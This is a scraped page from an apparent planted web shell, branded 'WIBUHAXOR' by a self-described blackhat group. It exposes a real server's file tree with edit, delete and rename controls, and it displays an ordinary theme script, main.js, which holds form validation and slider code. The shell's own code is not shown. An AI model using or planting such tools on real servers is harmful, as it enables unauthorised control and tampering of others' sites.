-
WIBUHAX0R1337
-
/
home
/
zqegovsj
/
www
/
us3web.haibo.com.cn
/
laundrypodsac
/
kr
/
js
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
mailform
--
NONE
wow
--
NONE
bootstrap-select.min.js
30.684KB
Edit File
Delete File
Rename
bootstrap.bundle.min.js
78.536KB
Edit File
Delete File
Rename
bootstrap.min.js
35.114KB
Edit File
Delete File
Rename
boss_filterproduct.js
2.178KB
Edit File
Delete File
Rename
cloud-zoom.1.0.3.js
15.709KB
Edit File
Delete File
Rename
custom.js
2.247KB
Edit File
Delete File
Rename
foot.php
7.876KB
Edit File
Delete File
Rename
getwidthbrowser.js
0.681KB
Edit File
Delete File
Rename
inquiryForm.js
7.04KB
Edit File
Delete File
Rename
inquiryForm_beanagent.js
7.633KB
Edit File
Delete File
Rename
jquery-1.11.2.min.js
93.687KB
Edit File
Delete File
Rename
jquery-2.1.1.min.js
82.274KB
Edit File
Delete File
Rename
jquery.appear.min.js
1.787KB
Edit File
Delete File
Rename
jquery.equalheights.js
1.332KB
Edit File
Delete File
Rename
jquery.fancybox.min.js
57.141KB
Edit File
Delete File
Rename
jquery.form.min.js
14.903KB
Edit File
Delete File
Rename
jquery.isotope.min.js
58.878KB
Edit File
Delete File
Rename
jquery.jgrowl.js
14.691KB
Edit File
Delete File
Rename
jquery.js
87.399KB
Edit File
Delete File
Rename
jquery.meanmenu.js
5.801KB
Edit File
Delete File
Rename
jquery.min.js
82.38KB
Edit File
Delete File
Rename
jquery.mobile.customized.min.js
17.117KB
Edit File
Delete File
Rename
jquery.prettyPhoto.js
35.358KB
Edit File
Delete File
Rename
jquery.rd-mailform.min.js
23.84KB
Edit File
Delete File
Rename
jquery.simplr.smoothscroll.min.js
0.752KB
Edit File
Delete File
Rename
jquery.ui.totop.js
1.23KB
Edit File
Delete File
Rename
jquery.waypoints.min.js
8.626KB
Edit File
Delete File
Rename
lang.js
3.13KB
Edit File
Delete File
Rename
main.js
32.558KB
Edit File
Delete File
Rename
mapmarker.js
2.059KB
Edit File
Delete File
Rename
odometer.js
10.022KB
Edit File
Delete File
Rename
script_0.js
11.731KB
Edit File
Delete File
Rename
sform.js
2.772KB
Edit File
Delete File
Rename
tilt.jquery.min.js
5.56KB
Edit File
Delete File
Rename
wow.js
11.656KB
Edit File
Delete File
Rename
/*-----------------------------------------------------------------------------------*/ /* Mian Js Start ( Drive Me - Driving School Management HTML5 Theme ) /*-----------------------------------------------------------------------------------*/ $(document).ready(function ($) { "use strict" /*-----------------------------------------------------------------------------------*/ /* PRELOADER /*-----------------------------------------------------------------------------------*/ $(window).bind("load", function () { $('.work-in-progress').fadeOut(100); if (jQuery(".scroll-div").length) { jQuery(".scroll-div").mCustomScrollbar({ theme: "dark-2", scrollButtons: { enable: false } }); } }); /*-----------------------------------------------------------------------------------*/ /* STICKY NAVIGATION /*-----------------------------------------------------------------------------------*/ $(".sticky").sticky({topSpacing: 0}); /*-----------------------------------------------------------------------------------*/ /* DATE PICKER /*-----------------------------------------------------------------------------------*/ $("#datepicker").datepicker({ inline: true }); /*-----------------------------------------------------------------------------------*/ /* ISOTOPE PORTFOLIO /*-----------------------------------------------------------------------------------*/ var $container = $('.portfolio-wrapper .items'); $container.imagesLoaded(function () { $container.isotope({ itemSelector: '.item', layoutMode: 'fitRows' }); }); $('.filter li a').on("click", function () { $('.filter li a').removeClass('active'); $(this).addClass('active'); var selector = $(this).attr('data-filter'); $container.isotope({ filter: selector }); return false; }); /*-----------------------------------------------------------------------------------*/ /* BANNER SLIDER /*-----------------------------------------------------------------------------------*/ $('.flexslider').flexslider({ animation: "fade", slideshow: true, //Boolean: Animate slider automatically slideshowSpeed: 6000, //Integer: Set the speed of the slideshow cycling, in milliseconds animationSpeed: 400, //Integer: Set the speed of animations, in milliseconds pauseOnAction: true, //Boolean: Pause the slideshow when interacting with control elements, highly recommended. pauseOnHover: true //Boolean: Pause the slideshow when hovering over slider, then resume when no longer hovering }); /*-----------------------------------------------------------------------------------*/ /* WOW ANIMATION /*-----------------------------------------------------------------------------------*/ var wow = new WOW({ boxClass: 'wow', // animated element css class (default is wow) animateClass: 'animated', // animation css class (default is animated) offset: 10, // distance to the element when triggering the animation (default is 0) mobile: false, // trigger animations on mobile devices (default is true) live: true // act on asynchronously loaded content (default is true) }); wow.init(); /*-----------------------------------------------------------------------------------*/ /* Parallax /*-----------------------------------------------------------------------------------*/ jQuery.stellar({ horizontalScrolling: false, scrollProperty: 'scroll', positionProperty: 'position' }); /*-----------------------------------------------------------------------------------*/ /* SCROLL TO TOP /*-----------------------------------------------------------------------------------*/ $(window).scroll(function () { if ($(this).scrollTop() > 100) { $('.scroll-top').fadeIn(); } else { $('.scroll-top').fadeOut(); } }); //Click event to scroll to top $('.scroll-top').click(function () { $('html, body').animate({scrollTop: 0}, 800); return false; }); $('.theme-title').click(function () { $('html, body').animate({scrollTop: 0}, 800); return false; }); $('.text-slider .get-form').click(function (event) { event.preventDefault(); if ((jQuery('header').hasClass('sticky'))) { $('html, body').animate({scrollTop: jQuery("#find-course").offset().top - 150}, 1e3); } else { $('html, body').animate({scrollTop: jQuery("#find-course").offset().top}, 1e3); } }); // --------------------------- Price Ranger ------------------------ // (function () { var price_slider = document.getElementById('price_slider'); if (jQuery("#price_slider").length) { noUiSlider.create(price_slider, { start: [10, 80], connect: true, step: 1, range: { 'min': 10, 'max': 100 } }); var valueMax = document.getElementById('max_price'); var valueMin = document.getElementById('min_price'); var labelMin = document.getElementById('label_min'); var labelMax = document.getElementById('label_max'); valueMax.style.display = 'none'; valueMin.style.display = 'none'; // When the slider value changes, update the input and span price_slider.noUiSlider.on('update', function (values, handle) { if (handle) { valueMax.value = values[handle]; labelMax.innerHTML = values[handle]; } else { valueMin.value = values[handle]; labelMin.innerHTML = values[handle]; } }); // When the input changes, set the slider value valueMax.addEventListener('change', function () { price_slider.noUiSlider.set([null, this.value]); }); } }()); }); /*-----------------------------------------------------------------------------------*/ /* DROPDOWN HOVER /*-----------------------------------------------------------------------------------*/ /*$('.navbar .dropdown').on("hover",function() { $(this).find('.dropdown-menu').first().stop(true, true).slideDown(0); }, function() { $(this).find('.dropdown-menu').first().stop(true, true).slideUp(0) });*/ /*-----------------------------------------------------------------------------------*/ /* TESTIMONIALS SLIDER /*-----------------------------------------------------------------------------------*/ $(".testi-slide").owlCarousel({ rtl: false, autoplay: true, //Set AutoPlay to 6 seconds items: 1, loop: false, nav: false, // Show next and prev buttons dots: true, navText: ["<i class='fa fa-chevron-left'></i>", "<i class='fa fa-chevron-right'></i>"] }); /*-----------------------------------------------------------------------------------*/ /* NEWS SLIDER /*-----------------------------------------------------------------------------------*/ $('.news-slide').owlCarousel({ rtl: false, dots: true, nav: false, loop: false, autoplay: false, autoplayHoverPause: true, smartSpeed: 100, responsive: { 0: {items: 1}, 1200: {items: 2}, 980: {items: 1}, 768: {items: 1}, 500: {items: 2} } }); /*-----------------------------------------------------------------------------------*/ /* RELATED SLIDER /*-----------------------------------------------------------------------------------*/ $('.raleted-slide').lightSlider({ item: 1, slideMargin: 0, adaptiveHeight: true, slideMove: 1, // slidemove will be 1 if loop is true speed: 400 }); /*-----------------------------------------------------------------------------------*/ /* SLIDER /*-----------------------------------------------------------------------------------*/ $(".owl-slide").owlCarousel({ rtl: false, autoplay: true, //Set AutoPlay to 6 seconds items: 1, loop: true, nav: true, // Show next and prev buttons dots: false, navText: ["<i class='fa fa-chevron-left'></i>", "<i class='fa fa-chevron-right'></i>"] }); /*-----------------------------------------------------------------------------------*/ /* POPUP VIDEO /*-----------------------------------------------------------------------------------*/ $('.popup-vedio').magnificPopup({ type: 'inline', fixedContentPos: false, fixedBgPos: true, overflowY: 'auto', closeBtnInside: true, preloader: true, midClick: true, removalDelay: 300, mainClass: 'my-mfp-slide-bottom' }); $('.gallery-pop').magnificPopup({ delegate: 'a', type: 'image', tLoading: 'Loading image #%curr%...', mainClass: 'mfp-img-mobile', gallery: { enabled: true, navigateByImgClick: true, preload: [0, 1] // Will preload 0 - before current, and 1 after the current image }, image: { tError: '<a href="%url%">The image #%curr%</a> could not be loaded.', titleSrc: function (item) { return item.el.attr('title') + ''; }} }); function validateForm() { var x = document.forms["newsletter"]["newsletter"].value; if (x == null || x == "") { alert("Name must be filled out"); return false; } } /*-----------------------------------------------------------------------------------*/ /* CONTACT FORM /*-----------------------------------------------------------------------------------*/ /* function checkmail(input){ var pattern1=/^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/; if(pattern1.test(input)){ return true; }else{ return false; }} function proceed(){ var name = document.getElementById("name"); var email = document.getElementById("email"); var company = document.getElementById("company"); var web = document.getElementById("website"); var msg = document.getElementById("message"); var errors = ""; if(name.value == ""){ name.className = 'error'; return false;} else if(email.value == ""){ email.className = 'error'; return false;} else if(checkmail(email.value)==false){ alert('Please provide a valid email address.'); return false;} else if(company.value == ""){ company.className = 'error'; return false;} else if(web.value == ""){ web.className = 'error'; return false;} else if(msg.value == ""){ msg.className = 'error'; return false;} else { $.ajax({ type: "POST", url: "submit.php", data: $("#contact_form").serialize(), success: function(msg){ //alert(msg); if(msg){ $('#contact_form').fadeOut(1000); $('#contact_message').fadeIn(1000); document.getElementById("contact_message"); return true; }} }); }}; */ // Content Contact Form // --------------------------------------------------------------------------------------- $(function () { if ($("#contact_form").length) { $("#contact_form .form-control").tooltip({placement: 'top', trigger: 'manual'}).tooltip('hide'); $('#contact_form .form-control').blur(function () { $(this).tooltip({placement: 'top', trigger: 'manual'}).tooltip('hide'); }); $("#contact_form #btn_submit").click(function () { // validate and process form // first hide any error messages //$('#contact_form .error').hide(); // name field var name = $("#contact_form input#name").val(); if (name == "" || name == "Name") { $("#contact_form input#name").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#contact_form input#name").focus(); $("#contact_form input#name").addClass('highlight'); return false; } else { $("#contact_form input#name").removeClass('highlight'); } // email field var email = $("#contact_form input#email").val(); var filter = /^[a-zA-Z0-9]+[a-zA-Z0-9_.-]+[a-zA-Z0-9_-]+@[a-zA-Z0-9]+[a-zA-Z0-9.-]+[a-zA-Z0-9]+.[a-z]{2,4}$/; //console.log(filter.test(email)); if (!filter.test(email)) { $("#contact_form input#email").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#contact_form input#email").focus(); $("#contact_form input#email").addClass('highlight'); return false; } else { $("#contact_form input#email").removeClass('highlight'); } // company, website field var company = $("#contact_form input#company").val(); var website = $("#contact_form input#website").val(); // message textarea var message = $("#contact_form textarea#message").val(); if (message == "" || message == "Message") { $("#contact_form textarea#message").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#contact_form textarea#message").focus(); $("#contact_form textarea#message").addClass('highlight'); return false; } else { $("#contact_form textarea#message").removeClass('highlight'); } var dataString = 'name=' + name + '&email=' + email + '&company=' + company + '&website=' + website + '&message=' + message; //alert (dataString);return false; $.ajax({ type: "POST", url: "php/contact-form.php", data: dataString, success: function () { $('#contact_form').prepend("<div class=\"alert alert-success fade in\"><button class=\"close\" data-dismiss=\"alert\" type=\"button\">×</button><strong>Contact Form Submitted!</strong> We will be in touch soon.</div>"); $('#contact_form')[0].reset(); } }); return false; }); } }); // Find course form // --------------------------------------------------------------------------------------- $(function () { if ($("#find_course").length) { $("#find_course .form-control").tooltip({placement: 'top', trigger: 'manual'}).tooltip('hide'); $('#find_course .form-control').blur(function () { $(this).tooltip({placement: 'top', trigger: 'manual'}).tooltip('hide'); }); $("#find_course #btn_submit").click(function () { // validate and process form // first hide any error messages //$('#find_course .error').hide(); // name field var name = $("#find_course input#name").val(); if (name == "" || name == "Name") { $("#find_course input#name").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#find_course input#name").focus(); $("#find_course input#name").addClass('highlight'); return false; } else { $("#find_course input#name").removeClass('highlight'); } // email field var email = $("#find_course input#email").val(); var filter = /^[a-zA-Z0-9]+[a-zA-Z0-9_.-]+[a-zA-Z0-9_-]+@[a-zA-Z0-9]+[a-zA-Z0-9.-]+[a-zA-Z0-9]+.[a-z]{2,4}$/; //console.log(filter.test(email)); if (!filter.test(email)) { $("#find_course input#email").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#find_course input#email").focus(); $("#find_course input#email").addClass('highlight'); return false; } else { $("#find_course input#email").removeClass('highlight'); } // phone var phone = $("#find_course input#phone").val(); if (phone == "" || phone == "123") { $("#find_course input#phone").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#find_course input#phone").focus(); $("#find_course input#phone").addClass('highlight'); return false; } else { $("#find_course input#phone").removeClass('highlight'); } // date var date = $("#find_course input#datepicker").val(); if (date == "" || date == "") { $("#find_course input#datepicker").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#find_course input#datepicker").focus(); $("#find_course input#datepicker").addClass('highlight'); return false; } else { $("#find_course input#datepicker").removeClass('highlight'); } // select1 var select1 = $("#find_course select#select1").val(); if (select1 == "" || select1 == "Course Type") { $("#find_course select#select1").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#find_course select#select1").focus(); $("#find_course select#select1").addClass('highlight'); return false; } else { $("#find_course input#select1").removeClass('highlight'); } // select2 var select2 = $("#find_course select#select2").val(); if (select2 == "" || select2 == "Car Type") { $("#find_course select#select2").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#find_course select#select2").focus(); $("#find_course select#select2").addClass('highlight'); return false; } else { $("#find_course input#select2").removeClass('highlight'); } // select3 var select3 = $("#find_course select#select3").val(); if (select3 == "" || select3 == "Time") { $("#find_course select#select3").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#find_course select#select3").focus(); $("#find_course select#select3").addClass('highlight'); return false; } else { $("#find_course input#select3").removeClass('highlight'); } var dataString = 'name=' + name + '&email=' + email + '&phone=' + phone + '&date=' + date + '&select1=' + select1 + '&select2=' + select2 + '&select3=' + select3; //alert (dataString);return false; $.ajax({ type: "POST", url: "php/find-course-form.php", data: dataString, success: function () { $('#find_course').prepend("<div class=\"alert alert-success fade in\"><button class=\"close\" data-dismiss=\"alert\" type=\"button\">×</button><strong>Contact Form Submitted!</strong> We will be in touch soon.</div>"); $('#find_course')[0].reset(); window.location.href = "05_courses-list.html"; } }); return false; }); } }); // paypal payment // --------------------------------------------------------------------------------------- $(function () { if ($("#user_billing").length) { $("#user_billing .form-control").tooltip({placement: 'top', trigger: 'manual'}).tooltip('hide'); $('#user_billing .form-control').blur(function () { $(this).tooltip({placement: 'top', trigger: 'manual'}).tooltip('hide'); }); $("#paypal_payment").click(function () { // validate and process form // first hide any error messages //$('#find_course .error').hide(); // name field var name = $("#user_billing input#ub_name").val(); if (name == "" || name == "Name") { $("#user_billing input#ub_name").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing input#ub_name").focus(); $("#user_billing input#ub_name").addClass('highlight'); return false; } else { $("#user_billing input#ub_name").removeClass('highlight'); } // surname field var surname = $("#user_billing input#ub_name_surname").val(); if (surname == "" || surname == "Surname") { $("#user_billing input#ub_name_surname").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing input#ub_name_surname").focus(); $("#user_billing input#ub_name_surname").addClass('highlight'); return false; } else { $("#user_billing input#ub_name_surname").removeClass('highlight'); } // phone field var phone = $("#user_billing input#ub_phone").val(); if (phone == "" || phone == "Your Phone") { $("#user_billing input#ub_phone").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing input#ub_phone").focus(); $("#user_billing input#ub_phone").addClass('highlight'); return false; } else { $("#user_billing input#ub_name_surname").removeClass('highlight'); } // email field var email = $("#user_billing input#ub_email").val(); var filter = /^[a-zA-Z0-9]+[a-zA-Z0-9_.-]+[a-zA-Z0-9_-]+@[a-zA-Z0-9]+[a-zA-Z0-9.-]+[a-zA-Z0-9]+.[a-z]{2,4}$/; //console.log(filter.test(email)); if (!filter.test(email)) { $("#user_billing input#ub_email").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing input#ub_email").focus(); $("#user_billing input#ub_email").addClass('highlight'); return false; } else { $("#user_billing input#ub_email").removeClass('highlight'); } // course name var course_name = $("#user_billing select#ub_course_name option:selected").text(); var course_name_id = $("#user_billing select#ub_course_name").val(); if (course_name == "" || course_name == "Course Name") { $("#user_billing select#ub_course_name").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing select#ub_course_name").focus(); $("#user_billing select#ub_course_name").addClass('highlight'); return false; } else { $("#user_billing input#ub_course_name").removeClass('highlight'); } // course date var date = $("#user_billing input#datepicker").val(); if (date == "" || date == "DD/MM/YY") { $("#user_billing input#datepicker").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing input#datepicker").focus(); $("#user_billing input#datepicker").addClass('highlight'); return false; } else { $("#user_billing input#datepicker").removeClass('highlight'); } // message textarea var message = $("#user_billing textarea#ub_message").val(); var dataString = 'name=' + name + '&surname=' + surname + '&phone=' + phone + '&email=' + email + '&course_name=' + course_name + '&date=' + date + '&message=' + message; //alert (dataString);return false; $.ajax({ type: "POST", url: "php/paypal-payment.php", data: dataString, success: function () { $('#user_billing').prepend("<div class=\"alert alert-success fade in\"><button class=\"close\" data-dismiss=\"alert\" type=\"button\">×</button><strong>Contact Form Submitted!</strong> We will be in touch soon.</div>"); $('#user_billing')[0].reset(); window.location.href = 'https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=' + course_name_id; } }); return false; }); } }); // Offline payment // --------------------------------------------------------------------------------------- $(function () { if ($("#user_billing").length) { $("#user_billing .form-control").tooltip({placement: 'top', trigger: 'manual'}).tooltip('hide'); $('#user_billing .form-control').blur(function () { $(this).tooltip({placement: 'top', trigger: 'manual'}).tooltip('hide'); }); $("#offline_payment").click(function () { // validate and process form // first hide any error messages //$('#find_course .error').hide(); // name field var name = $("#user_billing input#ub_name").val(); if (name == "" || name == "Name") { $("#user_billing input#ub_name").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing input#ub_name").focus(); $("#user_billing input#ub_name").addClass('highlight'); return false; } else { $("#user_billing input#ub_name").removeClass('highlight'); } // surname field var surname = $("#user_billing input#ub_name_surname").val(); if (surname == "" || surname == "Surname") { $("#user_billing input#ub_name_surname").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing input#ub_name_surname").focus(); $("#user_billing input#ub_name_surname").addClass('highlight'); return false; } else { $("#user_billing input#ub_name_surname").removeClass('highlight'); } // phone field var phone = $("#user_billing input#ub_phone").val(); if (phone == "" || phone == "Your Phone") { $("#user_billing input#ub_phone").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing input#ub_phone").focus(); $("#user_billing input#ub_phone").addClass('highlight'); return false; } else { $("#user_billing input#ub_name_surname").removeClass('highlight'); } // email field var email = $("#user_billing input#ub_email").val(); var filter = /^[a-zA-Z0-9]+[a-zA-Z0-9_.-]+[a-zA-Z0-9_-]+@[a-zA-Z0-9]+[a-zA-Z0-9.-]+[a-zA-Z0-9]+.[a-z]{2,4}$/; //console.log(filter.test(email)); if (!filter.test(email)) { $("#user_billing input#ub_email").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing input#ub_email").focus(); $("#user_billing input#ub_email").addClass('highlight'); return false; } else { $("#user_billing input#ub_email").removeClass('highlight'); } // course name //var course_name = $("#user_billing select#ub_course_name").val(); var course_name = $("#user_billing select#ub_course_name option:selected").text(); if (course_name == "" || course_name == "Course Name") { $("#user_billing select#ub_course_name").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing select#ub_course_name").focus(); $("#user_billing select#ub_course_name").addClass('highlight'); return false; } else { $("#user_billing input#ub_course_name").removeClass('highlight'); } // course date var date = $("#user_billing input#datepicker").val(); if (date == "" || date == "DD/MM/YY") { $("#user_billing input#datepicker").tooltip({placement: 'bottom', trigger: 'manual'}).tooltip('show'); $("#user_billing input#datepicker").focus(); $("#user_billing input#datepicker").addClass('highlight'); return false; } else { $("#user_billing input#datepicker").removeClass('highlight'); } // message textarea var message = $("#user_billing textarea#ub_message").val(); var dataString = 'name=' + name + '&surname=' + surname + '&phone=' + phone + '&email=' + email + '&course_name=' + course_name + '&date=' + date + '&message=' + message; //alert (dataString);return false; $.ajax({ type: "POST", url: "php/offline-payment.php", data: dataString, success: function () { $('#user_billing').prepend("<div class=\"alert alert-success fade in\"><button class=\"close\" data-dismiss=\"alert\" type=\"button\">×</button><strong>Contact Form Submitted!</strong> We will be in touch soon.</div>"); $('#user_billing')[0].reset(); } }); return false; }); } }); //Slider Product $(document).ready(function () { var sync1 = $(".sync1"); var sync2 = $(".sync2"); sync1.owlCarousel({ singleItem: true, slideSpeed: 1000, navigation: true, pagination: false, afterAction: syncPosition, responsiveRefreshRate: 200, navigationText: [ "<i class='fa fa-chevron-left'></i>", "<i class='fa fa-chevron-right'></i>" ] }); sync2.owlCarousel({ items: 4, itemsDesktop: [1199, 4], itemsDesktopSmall: [979, 3], itemsTablet: [768, 3], itemsMobile: [479, 2], pagination: false, responsiveRefreshRate: 100, afterInit: function (el) { el.find(".owl-item").eq(0).addClass("synced"); } }); function syncPosition(el) { var current = this.currentItem; $(".sync2") .find(".owl-item") .removeClass("synced") .eq(current) .addClass("synced") if ($(".sync2").data("owlCarousel") !== undefined) { center(current) } } $(".sync2").on("click", ".owl-item", function (e) { e.preventDefault(); var number = $(this).data("owlItem"); sync1.trigger("owl.goTo", number); }); function center(number) { var sync2visible = sync2.data("owlCarousel").owl.visibleItems; var num = number; var found = false; for (var i in sync2visible) { if (num === sync2visible[i]) { var found = true; } } if (found === false) { if (num > sync2visible[sync2visible.length - 1]) { sync2.trigger("owl.goTo", num - sync2visible.length + 2) } else { if (num - 1 === -1) { num = 0; } sync2.trigger("owl.goTo", num); } } else if (num === sync2visible[sync2visible.length - 1]) { sync2.trigger("owl.goTo", sync2visible[1]) } else if (num === sync2visible[0]) { sync2.trigger("owl.goTo", num - 1) } } // prettyPhoto // --------------------------------------------------------------------------------------- if ($("a[rel^='prettyPhoto']").length > 0 ){ $("a[rel^='prettyPhoto']").prettyPhoto({ theme: 'facebook', slideshow: 5000, autoplay_slideshow: true }); } });
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat